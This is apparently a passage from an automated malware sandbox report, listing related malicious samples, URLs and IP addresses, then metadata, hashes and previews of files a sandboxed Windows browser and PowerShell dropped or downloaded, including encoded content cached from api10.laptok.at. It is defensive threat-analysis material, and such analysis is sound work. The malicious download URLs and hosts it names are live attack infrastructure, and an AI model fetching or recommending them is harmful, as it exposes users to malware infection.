                                                                                                                                    a7APrVP2o2vA.vbsGet hashmaliciousBrowse
                                                                                                                                    • 47.241.19.44
                                                                                                                                    03QKtPTOQpA1.vbsGet hashmaliciousBrowse
                                                                                                                                    • 47.241.19.44
                                                                                                                                    2200.dllGet hashmaliciousBrowse
                                                                                                                                    • 47.241.19.44
                                                                                                                                    0RLNavifGxAL.vbsGet hashmaliciousBrowse
                                                                                                                                    • 47.241.19.44
                                                                                                                                    1ImYNi1n8qsm.vbsGet hashmaliciousBrowse
                                                                                                                                    • 47.241.19.44
                                                                                                                                    http://c56.lepini.atGet hashmaliciousBrowse
                                                                                                                                    • 47.241.19.44

                                                                                                                                    ASN

                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                    ZNETUSps002.ps1Get hashmaliciousBrowse
                                                                                                                                    • 45.10.69.141
                                                                                                                                    https://performoverlyrefinedapplication.icu/CizCEYfXXsFZDea6dskVLfEdY6BHDc59rTngFTpi7WA?clck=d1b1d4dc-5066-446f-b596-331832cbbdd0&sid=l84343Get hashmaliciousBrowse
                                                                                                                                    • 23.236.120.2
                                                                                                                                    http://profetestruec.net:8000/in3.ps1Get hashmaliciousBrowse
                                                                                                                                    • 45.140.88.145
                                                                                                                                    http://profetestruec.net:8000/dn6Get hashmaliciousBrowse
                                                                                                                                    • 45.140.88.145
                                                                                                                                    http://45.10.69.141/reinGet hashmaliciousBrowse
                                                                                                                                    • 45.10.69.141
                                                                                                                                    zISJXAAewo.exeGet hashmaliciousBrowse
                                                                                                                                    • 128.14.142.220
                                                                                                                                    zISJXAAewo.exeGet hashmaliciousBrowse
                                                                                                                                    • 128.14.142.220
                                                                                                                                    CLxJeVvzMA.exeGet hashmaliciousBrowse
                                                                                                                                    • 128.14.142.220
                                                                                                                                    http://128.14.134.170Get hashmaliciousBrowse
                                                                                                                                    • 128.14.134.170
                                                                                                                                    UPAS400CONRESTORE.ps1Get hashmaliciousBrowse
                                                                                                                                    • 45.140.88.145
                                                                                                                                    http://tftpd32.jounin.net/tftpd32_download.htmlGet hashmaliciousBrowse
                                                                                                                                    • 128.1.89.118
                                                                                                                                    in6.ps1Get hashmaliciousBrowse
                                                                                                                                    • 45.140.88.145
                                                                                                                                    SPECTRAIPSpectraIPBVNLSecuriteInfo.com.Generic.mg.81f401defa8faa2e.dllGet hashmaliciousBrowse
                                                                                                                                    • 45.138.24.6
                                                                                                                                    Online_doc20.01.exeGet hashmaliciousBrowse
                                                                                                                                    • 45.14.226.121
                                                                                                                                    P4fZLHrU6d.exeGet hashmaliciousBrowse
                                                                                                                                    • 45.14.226.101

                                                                                                                                    JA3 Fingerprints

                                                                                                                                    No context

                                                                                                                                    Dropped Files

                                                                                                                                    No context

                                                                                                                                    Created / dropped Files

                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{857C95B3-5D28-11EB-90E5-ECF4BB2D2496}.dat
                                                                                                                                    Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                    File Type:Microsoft Word Document
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):71272
                                                                                                                                    Entropy (8bit):2.0484353164072675
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:192:r6ZpZH2h9W2taf8hMZOktrsRtYOsIaOqsU5tE2AsrdA7X:rm/WhUW4dEwojMbmUrddu
                                                                                                                                    MD5:4CFCF7227FF7DC7824EF3F9EA8BBE4ED
                                                                                                                                    SHA1:C878D38295069CC9702DC6024223F964804361B6
                                                                                                                                    SHA-256:80CB15480006B62C73BF2616F0A46F1AEE638B4191221B92EF96FF53844B43E8
                                                                                                                                    SHA-512:28BF4F5CA96E79A6B326811426495B4DB33AAAACAFCCED8D8BBF53F919085D95BAE955EB82461C0B9E1842F1A5BA283376955C119285E84967381E03B5ABA7F7
                                                                                                                                    Malicious:false
                                                                                                                                    Preview: ................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{857C95B5-5D28-11EB-90E5-ECF4BB2D2496}.dat
                                                                                                                                    Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                    File Type:Microsoft Word Document
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):27580
                                                                                                                                    Entropy (8bit):1.909695499531613
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:192:rSZxQt67kKFj92IkWRM5XYdgkgX8hxlgkgX8hMhFCA:rOGYAKh0MqJUxgMpxgMM
                                                                                                                                    MD5:91841C928C3F59CEDF4426C6A26DE543
                                                                                                                                    SHA1:FA08A03954070FA3EA733302739F8264F61C0A45
                                                                                                                                    SHA-256:191F3A72558AEDBE3B42107342D7E9B445ACA2735255006272A5AD72BBF593A7
                                                                                                                                    SHA-512:9BA5AB8AFDB1CC933C65F0823217207F1957D93CDD4B5948D744E1DB36CD8B60679DCB526DE4AE74D75B1352EF75553C50DB8A2CFACEE570D854B149AE2CBBC4
                                                                                                                                    Malicious:false
                                                                                                                                    Preview: ................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{857C95B7-5D28-11EB-90E5-ECF4BB2D2496}.dat
                                                                                                                                    Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                    File Type:Microsoft Word Document
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):28160
                                                                                                                                    Entropy (8bit):1.9237042582674375
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:192:rRZPQ/6hkVFjB2kkWeMMYpRvKHVRWPvd6A:rXIySVhwQ3MgQ1899
                                                                                                                                    MD5:5231354835D84B386E9A62E075F294F6
                                                                                                                                    SHA1:BE7465A30C98C518995D42FD34AD0E2F7EB2E189
                                                                                                                                    SHA-256:EDF2CDCDBA80F59877235E5A4242B824B100AC0BA0E19A96244628CDC7042203
                                                                                                                                    SHA-512:D9C3A73D63072772D8E6E5CFBFFEF333182C5A699B353474D789269302C0DC3B735AE851E5440313E0EDE11DA972928B67F11A56ACD0AA3789D29541B76A9530
                                                                                                                                    Malicious:false
                                                                                                                                    Preview: ................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{8F03985F-5D28-11EB-90E5-ECF4BB2D2496}.dat
                                                                                                                                    Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                    File Type:Microsoft Word Document
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):27576
                                                                                                                                    Entropy (8bit):1.9105232158043417
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:192:rBZSQH6dkeFjd24kWQMfYxvhcdlvhc8QA:rH/aGehU8lf4vK/vKC
                                                                                                                                    MD5:DFCDC767666C8228C15ED324AD5B64B0
                                                                                                                                    SHA1:A2C2FD63B3B4925ACB959860E0D674EA92CCF23B
                                                                                                                                    SHA-256:56CA97426F7197920A0796ADC9491C0670D439DD393DEAF81FB77A9D624CBC52
                                                                                                                                    SHA-512:ACBAE96EC91FAC26A60566E34E03BA8771B144BEFEE3CA0A1B97734EE621F3E0A7ACFB424111701E36262C61D40DA30CF77A483A7866ACFDD4D0E75011073719
                                                                                                                                    Malicious:false
                                                                                                                                    Preview: ................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3Y2ADQKS\Yy[1].htm
                                                                                                                                    Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                    File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                    Category:downloaded
                                                                                                                                    Size (bytes):2448
                                                                                                                                    Entropy (8bit):5.988430821009398
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:48:65dFaQ3RjqAAsEpjiGbBkvCAxgKWnFhA8w9hOYjxlzwYdU0OaHuEE+:65dFaQ3MAz+erCslWoz/do+BE+
                                                                                                                                    MD5:4F8D671DC5EF44075D315C9FFBE28FB5
                                                                                                                                    SHA1:6368F6F09E7BF1CC333219C20FADFA57D0CEBB9B
                                                                                                                                    SHA-256:622D952F9F772B501121BBD30CBA300F1C9A50B6E025FEF43F51867A95C88E04
                                                                                                                                    SHA-512:C64361F1F3F32838F26E0C0BD02A095ABEC0E904EBA2AB06E7B3185681DD7989EAF060DF97809DE3204AF4B17D5A4526845EBD4029F70830A59ECD458C67BC74
                                                                                                                                    Malicious:false
                                                                                                                                    IE Cache URL:http://api10.laptok.at/api1/ON6JKCj_2BzCCDB/1zRXWjmGSH4dnXto7n/a3jbKUyFp/zm28mIKXIZXvZ9zAbzLK/ylKE7k3_2BbdPjjCSjH/Bhzm2iLbw_2BlZFjfzdu9K/QNeuz5NJoJPdd/3RpNk4gX/684IFalzbokAf38NKCQoGB3/giv4u8aUar/1Y3IwJEGTTwG7vgZb/hfQjMo3huzsc/_2B2kxzS9SV/aDAgJWuWGRyIv3/OVgklOZtJCDxn5mV_2BOp/ZWvDrGcJhzM9JQCv/ytbaFIu03cT7HsQ/LvD4iOQPI8imqvRWlT/lJ9Iessga/osAc16h46CUOpOSEj/Yy
                                                                                                                                    Preview: JeG/8wThylCEn4+CIU0cSt+a3bEgmuzbwI5qSRlMQL5GKcZqjCqkcbobMhHHksN4DbKnIi4XxkvbhSHHzI9vsYrmzzL54KXyN3V5WjH5uTFngsMbn4g1+cHmTrSSDIxwdMLA+yx7GUIUbcYQFjajdMEBr5+Vu+NSBnwlOFmrr+Ea0M6LQZ/N49l78d3GS21gIRDMibXNCK+lPILPST3AsQ7WZq6xdgKamM1Jaop83PBf5h2Dg7NNnPZl8I6i0A0NVehKYm9rOFYGbt6TpXMGiAngrM//llISOFipsc3ld3a/CzIsNjXB7NUViEzQdVg3TV1oq/k4nDHM8JDJhHZ3gAPxp8h441WUrWiaofeeFNAu+pdUNQ6+8HrkjFSmYjz93S3jebSkxKYGnmImxNjXcblYWqDKByQdcX45WPCRMCEEn5x7wkyf4JTB859nMg7eJPl0j6WLyNZhtdXJE6KAEEfAGo3ejMPHFeBmbTcpckNDN2YJuPYo8Zi+3VWjAbqfUjVVv98N9WOCJNBrnBt679sQalOjY2/QQSVYuu+vzXpGq081fObn3URplKaoMJlVDpIpFD18OkmnkH24ICd+Bk6L27VeXbBFvPaKksTCXOVZhAMKqZsJ0pKE7ENhvy85ec1fqkUInoL2E7VrDwPrP9CFkNK6oV4EgMxkEuWvfEkpdhiKx3hNemdof8QGw5A1/dambTm4yrFIwhcRsENlcsS4bHlgrGVvEWfXmfe9g9Embxn+yWh33CpZZ3H6HH7J2hssm/z87fLHQlZmTgajLDzaMSc9ThtbIc+RL2YPURknwKtcxdHLof45vD4LTjCo5bnRWAtJQy9w356LV567Q4pRsbj+wysHxPiKZYZmCPCRiwuqk7m2RdpCxS48UBkMxaByXpxHse1cqmVL/JRu+Gs+ehk6yxEBRhG9/UkNiAMHPm3npwxjdAX7++BVfTzRkCuaG1pa+WEHD2sTl/8kRdI/uKLkuSlfJIaelN+y
                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9QTQHWWN\34tuFQrR[1].htm
                                                                                                                                    Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                    File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                    Category:downloaded
                                                                                                                                    Size (bytes):340064
                                                                                                                                    Entropy (8bit):5.999861206284018
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:6144:JIRX8egUYt9OT0ijXuuBm3l5KQo9uUCFhYK7pdFT2DYdwYc08SsVH:JIh5gnwT04Dm3PG9unF6GX4DGq6sJ
                                                                                                                                    MD5:10FBC9D242FD8CD959FF426E4B62FBE6
                                                                                                                                    SHA1:72B6C613DCB5A501AA0F7AE15F3BD78627197C9B
                                                                                                                                    SHA-256:EC909CEE0478B6ED5C79D68B6DDD8CC80B5B707E5F74421980A475812BCBF069
                                                                                                                                    SHA-512:0CEC539006C6997E80436BA6090B3D0926DCD1031BF761482685E8A9B2C718C29B14A41EAF3EBEA40E1BD2F0945A384FDFE2460334316E05DD52812D9EEA2306
                                                                                                                                    Malicious:false
                                                                                                                                    IE Cache URL:http://api10.laptok.at/api1/e8J0mG5lwiTYI4icST/XwuRPk1WR/O2_2FLREL3g_2Bdsncic/_2F_2Fow8TpCB9p_2Bj/zmvfM_2BxkF2z6LAdGBQYT/VVFUBTjiLtdmv/z1vsS1b9/h_2Fj_2BxFVp8DBu2Dofcsv/Kv6seO5eeW/D_2BeLNZQPv2reEOP/gDxjD6y_2Ba9/4irkQZqxmvf/9gg2SCAj4TalZx/1SLIP2InPcQLc5ZsM9f5y/_2FMOWQ6jsIMXMBN/hDufArlyeEDIAOr/Sco7UD5GaVWTjyRv0y/uryOt5Vso/0DF8H9bz3K9Q8xTOA2GN/nbXSkM052l7YJ25GJNP/F1evg5adcZfk_2FVPUzqLE/34tuFQrR
                                                                                                                                    Preview: Jqhw2IavH8gZkhpcFrw1OLJBaU3JjzLdiA1RGDIRYDgU07YCjPuaB/bxTrBsjXh3SRTqeWes0lsYe+xeTCZoewfQSITdInGuCSyC+BM8izF19niprBwDmtq9Dpq43wqO5mT5wSWfZVgh9/vOjtuke72F3X2y8PNEshnUZSnVHXxlBWcSP59gSAEOiKj1eIPaPdFm9ThzRWlP0N3Y+nFSrJpbBs9Rfw9ueBfOTBZs15IZYX+RrdNFAqlh1x4wRa7jloacgXHC77xIO2TK+ofYKa9o10L+mWzxctg8rOl0KwmZkvzjdI+3eu+0jgqftO6jVPsBoDwxGUjwt3ofq5eee/X+q41KwH9afWCt0m0CidoYvIGIFgMGfhYniRSNgSJf92cZ55KKq15fO7CdupMB1IeiXcUeP39vl7vl1a4vQMe/gDQdZoZci9hbDWipAuGKFxx3rYxAep8hqVlV+KUBfn3XWKRfXcs/P0gZWLFQoJ9ah/TMBHOyVX70/kHv39iAiGg42udHX7tergSmifF4pSQ3LGSwniWbo78VCa7OTTIcGpCq6ZNjG751UcISxcWrGVZY6FCtVfWTqfZPbuZUOHV0RmTgyxfrnDDFTgPtyWuzAWK9aqPVqX+GDynkmmHTOT8ri9BhqfCssEc3JeyONyy9I6RvTtYRoTC8eeWUGuU4bRWF03LPUc/w/ttQgFpwg2EvkRRaLpu/V2P6PiLsROsGcDgMsNH+Dc2HpUMbGLtbA5+j3t9EmwpsbXGYD3MJBmRbXtkSdotAC9p2195oBKIBHFOJbgIIpD3eZES5HiGYNddREUByxgzNQEATb2HXAFpy0cOgBa4PjnqtQj1d9jSuzyviZM0yeFvLWTPHSjzw5Izr3vHCy11LpnyMzQmRLbyKsE7l5KqxjhRpe9OQ+JIAWsFFoYgYkVET6DSoRm8XWqkblYTlky5l1/1foE4WcWQmOt+hUWGLAY3bTgxd1+TQLKY8UPjIdJ8ZkWSk
                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OTUW0Q90\gGWW8[1].htm
                                                                                                                                    Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                    File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                    Category:downloaded
                                                                                                                                    Size (bytes):268376
                                                                                                                                    Entropy (8bit):5.999918699187254
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:6144:aTqvmKWC4cCv1Itz+s9VjKuzqfCexeYnwAA8xjRwP6QGfO4J8T60:vvmy438+mL2aedA8qV5fTP
                                                                                                                                    MD5:F02FC6B28F47EE93A0E03C115C9EC84F
                                                                                                                                    SHA1:572F29665167CD9E8E2C3EE2AF423021E43ADE4F
                                                                                                                                    SHA-256:3E7900ABB2A6339DDF27734A6C0DB61BB6C00959167864AFCC1CC63CC065C3E9
                                                                                                                                    SHA-512:7464DE67D7FE01847BFF8D8ED9D3469B6F7A5EFA0A03FCBF0B15D12557060E7C368578366FD83301C99A13DB2AED6064F0741843B686676BDAE0E7209FD9DF1D
                                                                                                                                    Malicious:false
                                                                                                                                    IE Cache URL:http://api10.laptok.at/api1/qvYtom7jPMjc/BwFvjaIO4Bv/MbiT4yG6pHfZnV/ZL7sBbHjAqjjVKuOVsR_2/BwLLpnqz5A7VsJpR/VO84dIDbsiOR8iF/cYWxYBw9oC1caEXJgQ/1ZZhS32tE/_2FIQD8vf0Ka7hthdepE/X6LzVrz2dY0Kt9O92Fg/RdwscE4szAaD7AwXR4Vb_2/BkqnQ_2BhW_2F/lBJqoDb5/VV0dcjLelYqerhB5eYzjTAM/cUE3isCvij/iDKviq_2BgRZp2DXp/gw7kl8fvts1f/V1i5c7M51yH/1feNv9xtSWcKia/RzrYlQJt9o9X3mmLIReIH/gGWW8
                                                                                                                                    Preview: b6ZoQgIoGqJcv4s29ASnrEL2xhhBFlKFoj5eXNabIbIhvuBAhPlh83ubwoiWRactF603IXktk4sTVVnjJiSi4lkpFNGdYcZzCzId7spWIxpNmj/4Zu2KkibFdF89vPGaESp92c8j1tucb8rDAmxTkH5tQLpSoBCMeoMqOAmQsLCynp9SCtGeeuvCscRl8Y0Yj4BjR/ISP3hP2joHhsUaiGvmZL5VNZyDhsZYqzM1/lpKrLQqiEcJncJGraiugGcArnMDWwqLcg256iuN7RvUjVXlRoCD0e1iancukR5cT/kjuIo1fX7rStItkYKnOxngzhgtdZnJUFMxsGZ/m2rbgGeuXT3eX3PfNolSk7pzWwekB8kbFvRBKoxWgSf/us0G2cyzS4pJdgbjxiwHleqBO8HhDg3SmiRQQ2XSG8OYABgYA6dr9GIXtnKGAkJPPFavZMF+VBh/LFMeQ/KS+FNmysNRBGN/GjYi2FIGoz52Uck+Vd5O1D1Q6s9DtEMUCTzAYVKiT+70Aq5F0y6z43ugTRwxBEijYC5YJrcfWFiEjO/iGMh1IsQvmMr2ib01+Nuiy70bK6tcFg3psQ4rMUgV6C93Bs2xCg/sCe23Nd9cEORS6S337hctq7SPzb4wRn3+ONm8nnrv7PE98WyL/pE3OFR36uYSp9/N37IYkhi9wMhTJ5GD7KMwGVgXGK/9A8KJfFw1FvEIit+EKFcMJugd1SeAQmv0eKtkg3ijZH0vYUH3huYJWQidfySq12ExSPk2cSZqZwaHRsd2euZB6MfsWpkD/iwT/YwGmGyDyGIzQO+ECV6aC54i4RWoDuuNKaWeXMshG0JHEnMhHk6Ivx2Z5nA7XVPkf1M1AzBDPtYcFXGg6r7gU5kc+hpjOMzLbID3GBeOye0heQwepVraJfZXccuGSaGsKK5eVbhRze6tTVn23qpQ4zskmpHWLd3VnhgWtLgEEHX5zJBcgYyiTyCrmIVHkrBej9a4aw/hDKZ8
                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
                                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                    File Type:data
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):11606
                                                                                                                                    Entropy (8bit):4.883977562702998
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:192:Axoe5FpOMxoe5Pib4GVsm5emdKVFn3eGOVpN6K3bkkjo5HgkjDt4iWN3yBGHh9sO:6fib4GGVoGIpN6KQkj2Akjh4iUxs14fr
                                                                                                                                    MD5:1F1446CE05A385817C3EF20CBD8B6E6A
                                                                                                                                    SHA1:1E4B1EE5EFCA361C9FB5DC286DD7A99DEA31F33D
                                                                                                                                    SHA-256:2BCEC12B7B67668569124FED0E0CEF2C1505B742F7AE2CF86C8544D07D59F2CE
                                                                                                                                    SHA-512:252AD962C0E8023419D756A11F0DDF2622F71CBC9DAE31DC14D9C400607DF43030E90BCFBF2EE9B89782CC952E8FB2DADD7BDBBA3D31E33DA5A589A76B87C514
                                                                                                                                    Malicious:false
                                                                                                                                    Preview: PSMODULECACHE......P.e...S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........7r8...C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af
                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                    File Type:data
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):64
                                                                                                                                    Entropy (8bit):0.9260988789684415
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:3:Nlllulb/lj:NllUb/l
                                                                                                                                    MD5:13AF6BE1CB30E2FB779EA728EE0A6D67
                                                                                                                                    SHA1:F33581AC2C60B1F02C978D14DC220DCE57CC9562
                                                                                                                                    SHA-256:168561FB18F8EBA8043FA9FC4B8A95B628F2CF5584E5A3B96C9EBAF6DD740E3F
                                                                                                                                    SHA-512:1159E1087BC7F7CBB233540B61F1BDECB161FF6C65AD1EFC9911E87B8E4B2E5F8C2AF56D67B33BC1F6836106D3FEA8C750CC24B9F451ACF85661E0715B829413
                                                                                                                                    Malicious:false
                                                                                                                                    Preview: @...e................................................@..........
                                                                                                                                    C:\Users\user\AppData\Local\Temp\JavaDeployReg.log
                                                                                                                                    Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                                                    Category:modified
                                                                                                                                    Size (bytes):89
                                                                                                                                    Entropy (8bit):4.378627150613191
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:3:oVXUOFxNYqAW8JOGXnEOFxNYgn:o9UOFxPqEOFxb
                                                                                                                                    MD5:2E9952CC0C89B2A6B0112F35E717A982
                                                                                                                                    SHA1:839DD5662B6042B2286B11BE6DE8A9F29FA2615B
                                                                                                                                    SHA-256:FA5C935329E895B0364C5B06DD460597D12139D45C260DCB028252F7CB4F03B7
                                                                                                                                    SHA-512:9A151B1F8D3A16ADB2A45AC091B8B3522EB9231CAC4EAE92739DE1E77543F89F87F6F664EC12D5C4D8528F9B06FA410175C0E30B73CA7FE12E67D2F40AF316D4
                                                                                                                                    Malicious:false
                                                                                                                                    Preview: [2021/01/22 19:10:35.735] Latest deploy version: ..[2021/01/22 19:10:35.735] 11.211.2 ..
                                                                                                                                    C:\Users\user\AppData\Local\Temp\RES9BB5.tmp
                                                                                                                                    Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                                                                    File Type:data
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):2192
                                                                                                                                    Entropy (8bit):2.7148307399407363
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:24:eapoSXaHHfhKdNfI+ycuZhNC3akSzgPNnq9SpYm9c:bySK5Kd91ulIa3Uq9z
                                                                                                                                    MD5:E9B27849A407549E319ACB2B6150716C
                                                                                                                                    SHA1:107B48E7B155B6E80646205EAE5953ED94F9CDBF
                                                                                                                                    SHA-256:5FFBDDD8656FB1D4F5818D46E7FFC21477C04C18A52193A5E7B0E1D61FBD2458
                                                                                                                                    SHA-512:3BA99870EC9596C3AE4A2D709E76D714C1A49F825318AC8E42F57D1C2AFE3806381FB7EDC003F9B13AC9997CAF805133ACAA18FFE85CF04E11982955B7537786
                                                                                                                                    Malicious:false
                                                                                                                                    Preview: ........W....c:\Users\user\AppData\Local\Temp\f1lrerxf\CSC9A4B28F2F0C74BBFAD6D775E23C8FA61.TMP................&..=..J(...F...x..........7.......C:\Users\user\AppData\Local\Temp\RES9BB5.tmp.-.<...................'...Microsoft (R) CVTRES.[.=..cwd.C:\Windows\system32.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                    C:\Users\user\AppData\Local\Temp\RESAC30.tmp
                                                                                                                                    Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                                                                    File Type:data
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):2192
                                                                                                                                    Entropy (8bit):2.7108039797575585
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:24:/agPynBaHO/hKdNfI+ycuZhNXakS5PNnq9Spvm9c:SkyncoKd91ulXa37q9o
                                                                                                                                    MD5:E6242C003EFBBE3505C62BF77F7E1BF5
                                                                                                                                    SHA1:A67BA2C841AD1A99F2A3832685A712540C8E04F2
                                                                                                                                    SHA-256:5623A266A00FC25F712BA80EFCB980B88222837C33673C6DE131236CA4DE14E0
                                                                                                                                    SHA-512:5B87DBA29134440E52E1F8E47160994EA92FF6704D42A10A4482C41E037FACDB81AEEC3786C16471905CD38C8B73512BFF0D997602A9AA5B9DE490DA71894323
                                                                                                                                    Malicious:false
                                                                                                                                    Preview: ........V....c:\Users\user\AppData\Local\Temp\ntdrbunx\CSC5967AF4362DF4FAC8293E16849360B0.TMP....................f.W.....L..!...........7.......C:\Users\user\AppData\Local\Temp\RESAC30.tmp.-.<...................'...Microsoft (R) CVTRES.[.=..cwd.C:\Windows\system32.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_e23dje1f.bec.ps1
                                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                    File Type:very short file (no magic)
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):1
                                                                                                                                    Entropy (8bit):0.0
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:3:U:U
                                                                                                                                    MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                    SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                    SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                    SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                    Malicious:false
                                                                                                                                    Preview: 1
                                                                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lrj1ceqt.bq5.psm1
                                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                    File Type:very short file (no magic)
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):1
                                                                                                                                    Entropy (8bit):0.0
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:3:U:U
                                                                                                                                    MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                    SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                    SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                    SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                    Malicious:false
                                                                                                                                    Preview: 1
                                                                                                                                    C:\Users\user\AppData\Local\Temp\f1lrerxf\CSC9A4B28F2F0C74BBFAD6D775E23C8FA61.TMP
                                                                                                                                    Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                                    File Type:MSVC .res
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):652
                                                                                                                                    Entropy (8bit):3.084692051518933
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryo3ak7YnqqzgPN5Dlq5J:+RI+ycuZhNC3akSzgPNnqX
                                                                                                                                    MD5:2610D23D91AA4A28FABF1846890F9E78
                                                                                                                                    SHA1:BBCB0477B5B759ED2039CC57CB5A1FAF2AD89151
                                                                                                                                    SHA-256:E53354B0AB300C2206C753317CA1C14426883B39A48DFEE51205C403B4A7E542
                                                                                                                                    SHA-512:09FF590B5071A7FC410A3FAAC95A8E2A408C263E9CEE5BCA92C38B15F46E8A56B5C0F3A7484D9342F699FA71F09D3F12E046A82193A9E7C3A8E93C7C931B9BDD
                                                                                                                                    Malicious:false
